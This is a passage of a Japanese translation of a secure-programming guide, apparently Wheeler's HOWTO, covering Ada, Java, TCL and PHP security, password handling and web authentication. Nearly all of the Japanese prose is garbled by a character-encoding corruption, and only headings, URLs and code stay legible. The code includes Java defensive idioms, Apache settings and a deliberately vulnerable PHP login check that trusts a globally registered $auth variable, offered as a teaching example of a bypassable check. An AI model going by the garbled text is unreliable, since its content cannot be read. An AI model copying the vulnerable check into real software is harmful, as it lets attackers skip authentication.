ɐݒ肷ׂłBÃvÔǂꂩuVFGXP
[vvgāA[UɃvO𓮂悤ɂȂĂ΁A
U҂͂̃VFGXP[v𗘗pĐtVFĂ܂
BAtVF PATH ݒ肵ĂȂ(ǂȃvO
̓)AU҂̓vȎŃVFGXP[v𗘗pł
(eLXgGfB^⃁[[_[)B́AVF̖ړI
̃vO̎sɂ_łB̃vOA]łȂ
F߂Ă邩܂BVF́Ȃ̖h~ɂ͉܂
B

 

9.5. Ada

Ada95 ł́AUnbounded_String ^̕AString ^_łP[X
łBŔAKvɉĎIɃTCYς邽߂łB
ApX[h閧̂悤ȋ@̒l Unbounded_String ɂ͓Ȃ
BRA_vy[WGAɂ̒lX܂ŎcĂ܂
邩ȂłBꍇɂ́AString ^gāAothers
=> ' ' ̂悤ɁA萔łɏ㏑ĂB

 

9.6. Java

Java gĈSȃvOJĂȂA܂ŏ̃Xebv
(Java ̊wK)́AJava ̃ZLeBɂĂ 2 ̊bIȃeLXg
ǂނƂłB̃eLXǵAGong [1999] McGraw [1999](҂ɂ
ẮAɃZNV 7.1 Ă)B܂ASun eSȃR
[ĥ߂̃KChC http://java.sun.com/security/seccodeguide.html
ĂB Java ̃ZLeBfɂẴXChA http:/
/www.dwheeler.com/javasec ŎRɌ܂B McGraw [1998]킹
ĂB

F񂪊JĂ悤ȃAvP[V́A炩ɂ̂̂
ˑĂ܂BNCAgł̗pړIɂ Java ̃R[h́AT
[õR[hȏɂ܂قȂ(ƐMf)ɂ܂B
ʌ͓Kpł܂BƂ΁AMłȂ[U̓͂ɑ
ẮA̓͂`FbNătB^Ȃ΂܂B
AJava ł́uBꂽv͂ALŘ_悤ȔzׂݓIȓ͂
݂܂B Johnathan Nightingale [2000] ɂ́AJava vO~Oɂ
ۑv񂵂Lq[A낢ƏĂ܂B

   
    c Java vO~Oő厖Ȃ̂́ApɋC邱ƂłBe
    ̃\bhC^tF[XAẽC^tF[XpȂAR
    [hɌJ댯܂B
   
L[ƂȂKChC Gong [1999] McGraw [1999]ASun ̃KC_X
AĎǧo炢炩Ă݂܂B

 1. public ȃtB[h͕ϐ́AgȂłBprivate Ő
    āAւ̃ANZX@\񋟂AĂ痘pĂ
    B
   
 2. \bh͑ɗRȂAprivate ɂĂ( private
    ɂȂȂAhLgɗRLڂĂ)B private ł
    \bh́AgŖh䂵Ȃ΂܂BȂȂA
    ꂽf[^󂯎邩Ȃł(ǂɂĖh䂷͂
    𐮂Ȃ)B
   
 3. JVM(Java Virtual Machine)́AANZVreBCq(Ƃ΁Au
    privatev) AvP[V(AvbgƂ͑ΏƓI)sɎۂ
    ͎{Ȃ\܂B̓_uSecure Programmingv[
    OXg 2000 N 11  7 ɎwEĂꂽ John Steven 
    (Cigital Inc.)Ɋӂ܂B̖́Aǂ̃NX̃[_[AA
    NZXvNX[h邩ɍE_ɂ܂BN
    XMłNX̃[_[(null ͊NX̃[_[
    ܂) 烍[h΁AANZX`FbŃu^vԂ܂(ANZ
    X)BƂ΁AL̂悤ɓ삵܂B (ȂƂASun 
    1.2.2 VM ł́B̎ł͓삵Ȃ܂)B
   
     a. public tB[h]҃NX(V)ARpC܂
        B
       
     b. ̃tB[hɃANZXuUҁvNX(A)ARp
        C܂B
       
     c. V  public tB[h private ɕύXāAăRpC܂
        B
       
     d. A 𓮂܂BA  V (݂ private )tB[hɃANZ
        X܂B
       
    AAvbgł͏󋵂ς܂B A AvbgɕϊAA
    vbgƂē삳(Ƃ΁AAvbgEr[A[uE
    U)ANX[_[́A͂Mꂽ( null) NX̃
    [_[ɂȂĂ܂B܂AR[h́A
    java.lang.IllegalAccessError ɓANX A  V.secret t
    B[hɃANZX悤ƂĂAƂbZ[Wo܂B
   
 4. static tB[h̕ϐ͎gȂłB̂悤ȕϐ̓NX
    ɑ܂(NXECX^Xł͂Ȃ)BāANX͑̃N
    XɂĈʒuÂāAstatic tB[h̕ϐ͑̂ǂ̃NX
    悤ɂȂ܂BȂĂ܂ƁASɂ̂܂
    ܂Ȃ܂B
   
 5. R[hɈӂ邩ȂꍇAmutable IuWFNgĕ
    Ȃ悤ɂĂ(R[h mutable IuWFNgύXĂ
    ܂Ȃ)Bz mutable ł邱ƂɒӂĂ
    (z̒g mutable łȂĂł)BāA@f[^
    zւ̎QƂ͕ԂȂłB
   
 6. [Ům mutable ȃIuWFNg(IuWFNg̔z܂)
    Ă̂܂ܕۑȂłBȂƁA[UIuWFNg
    SKvƂȂR[hɓnĂ܂܂BSKv
    R[h́ÃIuWFNgu`FbNvÃf[^gȂ
    AύXĂBz͓ŕۑOɃRs[āAӐ[
    Ă(Ƃ΁A[U쐬Rs[E[`ɂ͒ӂ
    )B
   
 7. ɗȂłBĂȂIuWFNg蓖
    @́A܂B
   
 8. ɗRȂ΁AׂĂ final ƂĂBNX̓
    \bh final łȂƁAU҂댯vȂ@Ŋg
    Ƃ邩܂BƁAZLeBƈɊg
    ]ɂȂ邱ƂYȂłB
   
 9. ZLeB́ApbP[W̃XR[vɗȂ悤ɂĂB
    ftHgŕĂ java.lang ̂悤ȃNX͏łBJava
    Virtual Machine(JVM)ɂ́ÃpbP[W悤Ƃ̂
    ܂BłȂ΁AJava ̃NX͕Ă܂B܂AU
    ҂͐VNXpbP[Wɓ邱ƂŁA̐VN
    XgāAh䂵ĂƎvĂIuWFNgɃANZXłĂ
    ܂܂B
   
10. inner NXgpȂłB inner NXoCgR[hɕ
    ƁAinner NX̓pbP[W̒̂NXANZ
    XłNXւƕϊĂ܂܂BɈƂɁANX
    vCx[gȃtB[h͂ނƈÖق private ł͂ȂȂA
     inner NX̃ANZXF߂Ă܂܂B
   
11. ŒɂĂBł邾Aʂȃp[~bV܂
    KvƂȂ悤ɂĂB McGraw ́Aɓݍ
    AǂȃR[hɂȂ悤ɐĂ܂B͂ăR[h
    ɏĂ܂(ƁA[Uu( )̈ꗗ
    lR[hs\vƂIł܂)B
    Aݒ肷Th{bNX̂̂KvƂ悤AvO
    ĂBɓKvȂAƂ킯
    ̃R[hčĂB
   
12. R[hɏȂ΂ȂȂA1 ̃A[JCut@Cɂ
    Ă[߂ĂB McGraw [1999]p̂K؂ł̂ŁA
    Lɍڂ܂B
   
       
        ̋K̖ړÍAقȂigݍ킹UhƂɂ
        ܂B̍ÚAU҂ӂR[hƏς݂̃NX
        ɃNAӐ}IɐΈꏏɎgƂȂ悤ɍ
        ς݃NXƃN肵āAVAvbg⃉Cu
        \z悤Ƃ܂BNX̃O[vɂ킹ď
        A̍UɍɂȂ܂BR[hɏs̃VX
        eł́A\ɈَȂ̂gݍ킹UɑΏł܂B
        Ă̋ḰÂ悤ȍUSɂ͖h؂܂B
        AA[JCu 1 ɂĂ΁AŌ͎󂯂܂B
       
13. NXłȂ悤ɂĂB Java IuWFNg𕡐
    dǵ݂ARXgN^ȂĂAU҂NX̃C
    X^X쐬łĂ܂܂BNX𕡐łȂ悤ɂ邽
    ߂ɁANXꂼŉL̃\bh`ĂB
   
    public final void clone() throws java.lang.CloneNotSupportedException { 
       throw new java.lang.CloneNotSupportedException();                    
       }                                                                    
   
    ǂĂNX𕡐\ɂKvȂAU҂
    \bhĒ`łȂ悤ɂ@܂Bŕ
    \bh`ĂȂAfinal ɂĂB`Ă
    ȂAȂƂLǉāAӂI[o[Chh܂
    B
   
    public final void clone() throws java.lang.CloneNotSupportedException { 
      super.clone();                                                        
      }                                                                     
   
14. NX̓VACYłȂ悤ɂĂBVACY
    AU҂ private ȕłĂAIuWFNg̓Ԃ
    悤ɂȂ܂Bhɂ́Ã\bhNXɒǉĂ
    B
   
    private final void writeObject(ObjectOutputStream out)             
      throws java.io.IOException {                                     
         throw new java.io.IOException("Object cannot be serialized"); 
      }                                                                
   
    VACY\ȏꍇAtB[hVXẽ\[X𒼐ڈ
    ĂAAhXԂɊ֘A܂ł肷ȂÃt
    B[h transient ݒ肷悤ɂĂBȂƁAN
    XfVACYƕsK؂ȃANZXF߂邱ƂɂȂ邩
    ܂B@̏ transient łƌȂĂǂƎv܂B
   
    ŃNXɃVACY郁\bh`ȂAǂ
    DataInput  DataOutput \bhɂznׂł͂܂
    B{IȗŔADataInput  DataOutput \bhAI[o[
    Ch\łBVACYłNX private Ȕz𒼐
    DataOutput(write(byte [] b)) \bhɓnƂƁAU҂
    ObjectOutputStream TuNX write(byte [] b)\bhI
    [o[ChAprivate ȔzɃANZXACł
    ɂĂ܂܂BftHg̃VACÝAprivate ȃoCgz
    tB[h DataInput  DataOutput ̃oCgz񃁃\bhɌJ
    ܂B
   
15. NXfVACYȂłBNXVACYĂ
    ȂĂAfVACYł邩܂BU҂D݂̒l
    ꂽoCgV[PXāANX̃CX^XƂăfVA
    CYł܂BςƁAfVACY͈ public ȃR
    XgN^ŁAU҂IuWFNg̏ԂIł悤ɂ܂B
    ͖̑炩Ɋ댯łBhɂ́AL̃\bhNX
    ɒǉĂB
   
    private final void readObject(ObjectInputStream in)                
      throws java.io.IOException {                                     
        throw new java.io.IOException("Class cannot be deserialized"); 
      }                                                                
   
16. OŃNXrȂłBU҂́Aǂ݂̂OŃN
    X`ł܂BӂȂƁÃNXɖ]܂Ȃ
    ^Ă܂A܂Bł́AԈƂāAIuW
    FNgm̃NXǂ𔻒fڂĂ܂B
   
      if (obj.getClass().getName().equals("Foo")) {             
   
    2 ̃IuWFNgAԈႢȂNXłƔfKv
    ΁A getClass()𗼎҂ɂĂA== ZqŔrĂB
    ܂肱̂悤ɂȂ܂B
   
      if (a.getClass() == b.getClass()) {                       
   
    IuWFNgm̃NX{ɎĂ邩ǂ߂Kv
    ȂAێqKɁAK݂̖O(gĂNX̃N
    X[_[)Ŏg悤ɂĂBL̂悤Ȍ`gĂ
    B
   
      if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
   
    ̃KChC McGraw  Felten ̃hLg̈p
    B̃KChC͗DĂ܂B͂ɉMāANX̒l
    ɂr͂ł邾̂łƂ܂BKv
    ȂƂĂANX\bhC^tF[X݌vK
    ؂łB݌v͖̂Ȃ̂ŁÃeNjbNm
    ĂƖɗ܂B
   
17. @(ÍpX[hAASY)R[hf[^ɕۑ
    ȂłB JVM ɂ͊ȒPɂ̃f[^Ă܂D܂Ȃ
    ̂܂BR[h𕡎GɂĂA͂U҂ɂ̓R[h
    BĂ܂B
   
 

 

9.7. TCL

TCĹAutool command languagev̗ŁAueBNvƌĂт܂B TCL
́AƃCu 2 ̕\Ă܂B̓Vv
eLXgłBR}hĂяoāAΘbIȃvO𓮂̂
ĂA{IȃvO~O@\Ă܂BCúAA
vP[VvOɑgݍ܂܂B

TCL ɂĂ̏͂ɁA TCL WWW Info <http://www.sco.com/
Technology/tcl/Tcl.html> ̂悤ȃTCg̃y[WŌ܂Bɋ
[̂́ASafe-TCL(TCL ŃTh{bNX) Safe-TK (Safe-TCL p
Th{bNXڐÂ GUI)łB WebWiseTclTk Toolkit
 TCL pbP[WIɔzu WWW ̂ǂł[hł
ɂĂ܂B WebWiseTclTk Toolkit ɂẮA http://
www.cbl.ncsu.edu/software/WebWiseTclTk. ɂɏڂ񂪂܂B
ǂ̒xR[hr[Ă̂A͂肵܂Bɖ𗧂
񂪁Acomp.lang.tcl  FAQ http://www.tclfaq.wservice.com/tcl-faq ɍ
Ă܂B TCL ڎwĂƂ낪AAuVvv
ł䂦ɁAvȏɐ܂B Richard Stallman ́u
Why You Should Not Use TCLv <http://sdg.lcs.mit.edu/~jchapin/6853-FT97
/Papers/stallman-tcl.html> ĂBƂ΁ATCL ͊TOAf[
^^ 1 ݂()Aꂪ܂܂ȃvO̍쐬
Ă܂(sxȂĂ܂)B܂A TCL vO
ɂ킩Ƃ܂B́Aӂ͕ɂāAȒP
vOŎvȂĂ܂_łBƂ΁AU
͂Ȃ TCL vO𗘗pāA\ȂƂsĂ܂
܂B\ȂƂƂ́ATCL ɂƂēʂȈӖ
łXy[XdpAʁAhLAuPbg𑗂
Ƃł(́Aɂ̕𔭐͂쐬܂)B
܂AZLeB̋EɈʒuāAȂ΂ȂȂvO
̂ɂ́ATCL 𐄏ł܂BǂĂ TCL IтȂA
S̒ӂ𕥂āA[U̓͂ɂăvOu܂Ȃv悤
ɂĂB̈ŁATCL vOoCpR[h
̂ɑSRpłȂAƂR(s\ȃr[ȊO)𗝉ł܂
Bȏ TCL ̗pxĂl܂B
TCL Th{bNXoŎĂ鐔Ȃ 1 
B

 

9.8. PHP

SecureReality ́AɋuA Study In Scarlet - Exploiting
Common Vulnerabilities in PHPv[Clowes 2001]vƂhLgo
ĂāAPHP 4.1.0 ȑÕo[WɃ^[Qbg𓖂āASȃvO
ŖƂȂ_̂_Ă܂B̃hLgł́u
w͂ƂĂAPHP ňSȃAvP[V͔̂ɓ
(PHP ̃ftHg̐ݒł)vƌ_ÂĂ܂B

ǂȌɂZLeB̖͂܂APHP ɂ͈Sエ炭
̑唼̌Ɣׂčۂ_ 1 ܂B͖OԂɃf
[^[h@łBftHg PHP (o[W 4.1.0 ͂
Âo[W)́A Web  PHP ւƑϐƂ̒l
ׂāAIɓO (O[oϐ)Ƀ[h܂Bʏ̕ϐ
Ƀ[h܂BāAU҂͎Rɕϐ₻̒lݒ\
ŁAPHP vOčĐݒ肵ȂA̒l͂̂܂܂ɂȂĂ
܂B PHP ͍ŏɕϐvɁAftHg̒l
肵܂BāAPHP vO͕ϐȂ̂ʂłB
ϐݒ肷̂YƁAPHP ͕񍐂܂AftHgł͂
ȂĂ܂BYĂ͂Ȃ_́AꂪPɃG[̕񍐂ł
āAU҂ʂłȂ@āAG[NƂ~߂Ȃ
ƂłB܂ PHP ̓ftHgł́AvOU҂ɑ΂ēʂ
ӂ𕥂čU҂𕉂ȂAvOɂϐׂĂ̒l̃R
g[SɋĂ܂Ă܂BvOƁA
̕ϐĐݒł܂Aǂ̕ϐ̍ĐݒɎsĂ(͂ƂĂ
ȂĂ) PHP vO̐ƎコɂȂł傤B

Ƃ΁AL PHP vO(Clowes ɂ)́ApX[hm
Ălɂdvȏ^悤ƂĂ܂AU҂ Web u
EUŁuauthvɒlݒ肵AF؃`FbŇ͂킹܂B

 <?php                                                                 
  if ($pass == "hello")                                                
   $auth = 1;                                                          
  ...                                                                  
  if ($auth == 1)                                                      
   echo "some important information";                                  
 ?>                                                                    

̑ɂÂƂ킯댯Ȗᔻl吨܂BPHP ͍L
ɎgĂ̂ŁA͐[łBǁAȒPɎg錾́AȒPɈ
SȃvO悤ɂȂĂ܂B PHP ł́A݌vɌʂ
Ă܂̋@\𖳌ɂł܂Buregister_globalsvuoffvɂ
΂悢̂łBAPHP  4.1.0 Vo[Wł́AftH
gŁuonvɂȂ܂B4.1.0 ȑO register_globals  off ɂĎgp
͍̂łB PHP ̊J҂́APHP 4.1.0 ̃AiEX̒ŉL̂悤
ɏqׂĂ܂BuPHP ̎̏W[Eo[WAbvł́AftH
g register_globals  off ɂȂăCXg[܂v

uregister_globalsvuonvɂȂĂ PHP ́AdvȃvOɂƂ
Ċ댯ȑIƂȂ܂BƂȒPɈSłȂvO邩
BAuregister_globalsvuoffvɂȂ肳΁APHP ͊J
̂ɂȂȂg錾ɂȂ܂B

ftHgSɂɂ́Auregister_globalsvuoffvɂ邱ƁA
[UȌ񌹂瓾͂ɑ΂ĐݒsA₷ł
@\ǉ邱Ƃ܂B Web T[o(Apache ̂悤)́A
 PHP Sɐݒ肵ăCXg[ł܂B[U󂯎肽
ϐȒPɃXgAbvł悤ȃ[` PHP Cuɓ
܂B֐ɂ́AϐȂ΂ȂȂp^ѕϐ
΂ȂȂ^`FbN̂܂B̍lł́AAS
 Web J PHP ̗p̂͂ǂƎv܂ (register_globals 
on Ȃ̂)BAƂC΁A育ȎiɂȂ܂B

PHP gƌ߂ȂAŃAhoCXĂ܂(
̃AhoCX̑́AClowes NĂւ̑Ώ@x[X
ɂĂ܂)B

 E PHP ̐ݒIvVłuregister_globalsvuoffvɂāA
    4.1.0 ȏ̃o[W𗘗pĂB PHP 4.1.0 ł͂
    ʂȔzpӂĂāA̒ł $_REQUEST ́uregister_globalsv
    uoffvɂĂꍇ PHP ł̃\tgEFAJeՂɂ܂B
    register_globals ݒ肷邱ƂŁAPHP ɑ΂Ԃ悭U
    Sɔrł܂B܂̐ݒ肪VKCXg[̃ftHgɂȂ
    ̏ɂȂ܂B register_globals  off ł邱ƂOɂ
    ȂA܂̓_`FbNKv܂(ȂĂȂ
    f܂)B΁AvOCXg[lA肪
    邱ƂɂCt܂BT[hp[eB PHP AvP[Vł
    ݒœ삷̂͏łBČł́AWeb TCgŊS
     off ɂ͍̂ł邱ƂYȂłB܂Au
    register_globalsv𖳌ɂƁAT[hp[eBɂzXeBO
    Ȃ܂BvÔuregister_globalsv
    uoffvɂĂ邱Ƃ͉\łBƂ Apache ȂAL̍s
    PHP ̃fBNg .htaccess t@CɉĂ(
    Directory ߂gĂɐĂ)B
   
     php_flag register_globals Off                              
     php_flag track_vars On                                     
   
     .htaccess t@ĆAApache  Web T[oݒ̏㏑
    ĂȂ΁AɂȂ܂BApache Ŝ̐ݒ
    AllowOverride  None Ɛݒ肳Ă̂ʂłB
    Apache [UȂ΁AWeb ̃zXeBOET[rXɑ΂āAu
    AllowOverride IvVvݒt@Cɐݒ肷悤ɐĂ
    ĂBłȂAwp[֐āAKvȃf[^(
    f[^)̂܂܃[hĂB
   
 E register_globals  on ɂȂēĂƎvƂŁA\tg
    EFAJȂ΂ȂȂȂ(Ƃ΁Aɑ݂ PHP
    AvP[V)A[Uݒ肵ĂȂlɐݒ肷悤ɂ
    B PHP ̃ftHglOɂȂłB܂Ŋm
    ɐݒ肵ϐłȂ΁AMpĂ͂܂BɂȂǂ̕
    łAsȂ΂܂ (Ƃ PHP vO PHP
    g HTML t@Cׂ)BőP̉́APHP vOꂼ
    ɑ΂āAgpϐׂĂɒlݒ肷邱ƂłB
    ʂ̃ftHgl(""  0)Đݒ肷ƂĂłBɂ́As
    ɕKv include t@CɓĂO[oϐ⃉Cu
    ׂĂɂĂ͂܂܂Bɂ̓_AĂs邱Ƃ
    ɂĂ܂B́AJ҂̒łׂẴO[oϐ
    Ă̊֐痘p邩ȂƂ_{ɒmĂāA
    ĂlȂłB@łAHTTP_GET_VARS
     HTTP_POST_VARSAHTTP_COOKIE_VARSA HTTP_POST_FILES {oA
    [Uf[^pӂĂ邪AvO}̏񂷂ׂĂ`Fb
    NYĂȂ܂B܂ PHP Vf[^ǉ
    ƉN邩܂(Ƃ΁AHTTP_POST_FILES ͌Âo[W
    ɂ͂܂)B
   
 E G[񍐂̃x E_ALL ɐݒ肵āAׂẴG[eXgɕ
    悤ɂĂB肱̕񍐂ɂ́AĂȂ
    ɂĂ̌x܂Bꂪ PHP ł͏dvȖɂȂ܂B
    ɂ PHP g͂߂ȂA͗ǂlłBȂȂvO
    fobÔɂ𗧂łBG[񍐂̃xݒ肷
    ̂ɂ́A낢ȕ@܂Buphp.inivt@C(S)
    u.htttpd.confvt@C(zXg 1 )Au.htaccessvt@C(z
    Xg)A̓XNvg̃gbvxŁAG[񍐊֐ʂčs
    Ȃ܂BG[񍐃x̐ݒ@́Aphp.ini t
    @Cƃgbvx̃XNvgŐݒ肷@łB
    A(1)gbvx̃XNvgɃR}hY(2)vO
    ʂ̃}VɈړ php.ini t@CύXYAƂƂh
    ܂B܂ PHP vOꂼꂪAL̂悤ɂ͂܂ׂ
    B
   
      <?php error_reporting(E_ALL);?>                           
   
    G[̕񍐂́AJɗLɂA{Ԃ̃TCgł͖ɂׂł
    AƂ_ɂĂ͋c_̗]n܂(̂悤ȃG[EbZ
    [W͍U҂ɂƂĖɗ񋟂\邩ł)B
    Ȃ̂́Au^pvɖɂÂ܂܂̏ԂŊJ
    ɂĂƂłBāAʂ͒PȃAv[`āAJ
    A{Ԃꂼ̂͂܂ɓ邱Ƃ𐄏܂B
   
 E t@C쐬̂Ɏg郆[ÚAǂӐ[tB
    ^ĂBƂ킯[gt@Cւ̃ANZX͖hł
    B PHP ̓ftHgŁu[gt@Cv@\Ă܂B
    Afopen() ̂悤ȃt@CI[vR}h݂Ă܂
    B̌ꂪ[Jt@CI[vł̂ɑ΂āÃT
    Cg Web  ftp ̗vĂяôɎۂ悭g܂B
   
 E PHP ̌Â`Ńt@C̃Abv[hȂłB
    HTTP_POST_FILES zƂɕt֐gĂB PHP ̓t
    @CAbv[ĥɁÃt@Cǂ̃e|̃f
    BNgɓ̖OŒuĂ܂B PHP ͂Aϐ̊񂹏W
    ߂ɑ΂ĐݒsAt@Cǂɂ邩܂BA
    U҂͕ϐ₻̒lRg[̂\Ȃ̂ŁA̋@\
    gāAƂłȂƂN܂B̂ɁAHTTP_POST_FILES
    Ƃɕt֐gāAAbv[hꂽt@CɃANZX
    ĂB̉@ƂĂAU҂ȓẽt
    @Ce|ŃAbv[hłĂ܂܂B͂ꎩ̊
    łB
   
 E hLgc[ɂ́Aیς݂̓ĂB
    ̃R[h (啔łׂł)́AhLgc[̊O
    uĂB PHP ͂̃gsbNXɂāAcOȕ񍐂ߋ
    날܂BX́APHP [Úu.incv(include)gqg
    Au܂܂vt@CT|[gĂ܂BÃt@C
    ɂ̓pX[h̏܂B܂ Apache ́u.incvt@C
    hLgc[ɂAv肳΁Av҂ɂ̓e
    ^Ă܂Ă܂B܂ŊJ҂́AׂẴt@CɁu.php
    vƂgqtĂ܂B͂̃t@CȂ
    Ӗ܂BAł͂Ȃt@CɂȂĂ
    ܂΁AƂĈpĂ܂܂Bqׂ悤ɁAZL
    eB̃AhoCXňԑ؂ȓ_́AłBhL
    gc[ɂ́Aیς݂̓(t@C)ĂB
    ̃R[h(Ƃ΁ACu)́AhLgc[̊OɒuĂ
    Bǂȁu.incvt@ChLgc[ɂ͓Ȃł
    B
   
 E ZbV@\ĂBuZbVv@\́A֗ɉiI
    ȃf[^ۑł܂A̎ɂ͖_񂠂܂B
    ܂AftHgł̓ZbV̓e|t@Cɏۑ
    BāA}`zXgȃVXełƁAU
    oɑ΂Č邱ƂɂȂ܂B̓}`zXgȃVXeł
    ȂĂAȂƂ܂B̏t@CVXe
    ł͂ȂAf[^x[XƁuRÂvƂ\łBAʂ̐l
    Ԃ}`zXgȃf[^x[Xœp[~bVŃf[^x[X
    ɃANZXłȂA͈ꏏłBCĂȂƞBɂȂ
    ܂(uZbVlȂ̂U҂ݒ肵lȂ̂킩Ȃ)AU
    ҂I񂾓ẽt@C⌮T[oɖ肨Ă܂Ƃ
    \łB͕ȏ󋵂łB܂AU҂͂xAt@C
    ⌮ǂɒuRg[邱Ƃ\łB
   
 E ͂ANZXĂ܂Ȃ̂Ap^ɏƂ炵킹Ăׂă`F
    bNĂ(Ɠ悤)BČ^ϊgāA
    ͂Ȃf[^Iɂׂ^ɂĂ܂ĂBuwp[
    v֐J΃`FbNȒPɂȂA(\z͈͓)͂I΂
    Xg荞߂܂B PHP ͌^̐񂪊ɂAꂪN
    ܂BƂ΁A̓f[^̒lu000vȂAu0vƂ͓Ȃ
    񂵁Aempty() Ȃ܂B͘AzzɂƂāAƂ
    dvłB̓CfbNX񂾂łB $data["000"]
    $data["0"]Ƃ͈ႤƂӖ܂BƂ΁A$bar  double ^ł
    ƊmFȂ΂܂(mF́A double ^ɂƂĂ̂݁A
    tH[}bgƂȂ܂)B
   
      $bar = (double) $bar;                                     
   
 E 댯͂ł֐ɂ͓ɒӂ𕥂ĂB̊֐ɂ
    PHP R[h̎s(Ƃ΁Aexec() passthru()Abacktick ZqA
    system()Apopen())t@C̃I[v(Ƃ΁Afopen() readfile
    ()Afile())܂B͊ȃXgł͂܂B
   
 E K؂ȏꍇɂ́Amagic_quotes_gpc()gĂB낢ȍU
    r܂B
   
y󒐁Fł́AIuWFNgwXNvg Ruby ɂӂĂ܂
B󒐂ƂĊȒP Ruby ̂ƂɂӂꂽƎv܂B Ruby ɂ̓ZL
eBf݂Ă܂B傫킯 2 ̊댯ȃP[Xz肵Ă
܂B 1 ́AMłȂf[^ꍇA 1 ́AMłȂ
vOꍇłB̃P[XɑΉāAx 0  4 ܂ł
ZLeBEx $SAFE ƂO[oϐpăXbhPʂ
ݒł܂BӂĂ̂́AC ŏꂽgݍ݃C
uAgCuƂAׂẲ`FbNĂۏ؂
Ȃ_łB`FbN̂́A쐬҂ɂ܂Ă܂BZL
eBf̏ڍׂɂẮAuIuWFNgwXNvg Ruby t
@X}jAv́uZLeBfv <http://www.ruby-lang.org/
ja/man-1.6/?cmd=view;name=
%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%A5%E2%A5%C7%A5%EB> QƂĂ
z

 

Chapter 10. IȘb

                                    lɂ͂̌̐Ƃ 
                                    BmȎ҂ɂ͖m@ƂȂB 
                                                                       
                                          񐹏⼌ 16  22 (NIV)
 

10.1. pX[h

ł邾pX[hR[hOŏȂ悤ɂĂB
Ƀ[JȃAvP[V̏ꍇAʏs[ŨOCF؂ɂ܂
Ă܂悤ɂĂBAvP[V CGI XNvg̏ꍇA
Web T[opӂĂhɂł邾܂ĂB Web T
[oɂF؂̈ɂĂ͉LQƂĂBAvP[V
lbg[NoRŗp̂ȂAŃpX[h𑗂Ȃ
(ł邾)BƂ̂́Albg[N𓐒邱ƂŁAƂ
ȒPɉ肳āAŎgĂ܂łBpX[huÍv
ĂÄÍASYŌŒ̌gĂA̔
JASYgĂ肷ȂA{IɕŃpX[h𑗂
̂ƓłB

lbg[NŗpȂAȂƂ_CWFXgEpX[h̎gp
lĂB_CWFXgEpX[h̓nbVŐpX[h
łBʏ́AT[oNCAgɉf[^(Ƃ΁AtAԁAT
[o)𑗂ANCAg͂̃f[^ƃ[ŨpX[hgݍ킹
A̒l(u_CWFXgEpX[hvƌĂт܂)nbV܂B
ănbVʂ̂܂܃T[oɕԂ܂BT[o͂̃nbVl
؂܂B͂܂܂BƂ̂́ApX[h͂ǂȌ`ł
ۂɂ͑ȂłBpX[h̓nbVľƂĎg邾
łB_CWFXgEpX[h͕ʂ̈Ӗł́uÍvƂ͌Ȃ
̂ŁA@ŋ@p̈Íɐ݂Ă鍑łF߂Ă܂B
_CWFXgEpX[h́AڂĂUɂ͎ア̂łAlb
g[N̓ɑ΂Ă͗LłB_ 1 ɁA_CWFXgEpX[
h̓삪܂BT[o̓nbVĂȂpX[hׂĎ
Ȃ΂Ȃ炸AꂪT[oȖΏۂƂĖ͂̂ɂĂ
B

AvP[VŃ[UpX[hݒł̂ȂApX[h`
FbNāAuK؂ȁvpX[hĂ(ɍڂĂ
Aȏ̕łA)BK؂ȃpX[h̕t
A http://consult.cern.ch/writeup/security/security_3.html Ă͂
ł傤B PAM gȂ痘p܂傤B\ȃpX[h
@\T|[g邩łB

 

10.2. Web ̔F

Web ̐Eł Web T[o͒ʏ탆[UF؂̂ SSL  TLS 
gAT[oF؂Ă܂B[UNȂ̂̔F؂́AȒP
Ƃł͂܂B SSL  TLS ̓NCAg̔F؂łAۂɎg
pɓāAĂ܂(Ƃ΁AWeb uEU͋
ʂ̃[UF،`T|[gĂ炸A[UCXg[͖̂
|ł)B Java  Javascript gƁAꎩgɖ肪܂B
A[ȖɂĂAt@CA[EH[ɃtB^
肷邩łBāAǂ炩ƂƒxȂ܂BĂ̏
A[UɃvOCCXg[͔̂񌻎Ił܂B
AVXerI[UȂCglbgȂA̕@
K؂܂B

Cglbgp̃AvP[V\zĂȂAʏ͔F؃VXe
łA[UpĂ̂g悢ł傤B܂
A[U Kerberos ɈˑĂȂAVXe Kerberos g悤
ɐ݌vĂBF؃VXéAAvP[V̑̕Ɨ
ĂĂBgDƂ̂́ÂF؃VXeύX
Ȃł(ύX܂)B

eNjbNɂ́A@\ȂA삵Ă܂Ȃ̂
܂Bux[VbNF؁vƂ@gƂ܂ꍇ܂B
̕@ׂ͂ẴuEUT[oŊ{IɔĂ܂B܂Ȃ
ƂɁAx[VbNF؂̓pX[hÍɑ܂Băp
X[h𓐂ݎ͖̂{ɊȒPłBx[VbNF؂͂ďdvł
ȂȂAPƂŏ\ɗ܂Bx[VbNF؂̃pX
[h SSL  TLS ʐM(Í܂)łׂĔ킹Ă܂܂B
̓ptH[}X]ɂ܂Bu_CWFXgF؁vƂg
B͗Dꂽ@łAuEULT|[gĂ킯ł͂
܂BF؏[UI URL ɓ邱Ƃł܂A
͂Ȃ󋵂قƂǂłB̏[N@͂܂ɂ
񑶍݂܂(Ƃ΁AuEȖۑĂ闚OvNV
OA Referer: tB[hoRő Web TCgg)B

ŁA Web ōłǂgĂFؕ@́ANbL[𗘗p
̂łBNbL[́AF؂̂߂ɐ݌vꂽ킯ł͂܂B
FؖړIɂgƂł܂Bg΁AZLeB
̐Ǝコ炵Ă܂܂BӂĂBNbL[ɂďڂ
́AIETF RFC 2965 ȑO̎dlƂƂɌĂBNbL[g
ꍇɁAuEUɂ(Ƃ΁AMicrosoft Internet Explorer 6) vC
oV[Evt@C(p3p.xml ƂOŁAT[õ[gfBNɑ
݂܂)v̂܂B

[Uɂ̓NbL[󂯎ȂlāẢ@ł͂܂肪
_Cɗ߂ĂĂB~΁A̔F؏ HTML tH[
 hidden tB[hoRĂ肷ׂł(啔̃uEUŃT
|[gĂ܂̂ŐSzpł)B܂ł܂ZppāA
f[^[UT[oɑĂƂĂANbL[Ɠ悤ȉ
@gĂĂƎv܂B񂱂̉@ȂA
̃y[W̃LbVAO҂ɐ΂ɎgȂ悤ɂݒ肪K
vɂȂ܂BNbL[gȂ]܂Ƃ͎v܂Ȃ̉
@ł͎ۂɂ͂ɑ̊Jׂ܂B̂߁ÃA
vP[VJ҂FĎŝ͍Ȃ̂ŁA͂̉
@E߂͂܂Bĝ܂ɂ@(J҂
[U)AȂɈSŁAȂɎg₷@ɂĐ
Ǝv܂BقǋJȂłȂAЂƂF؏t
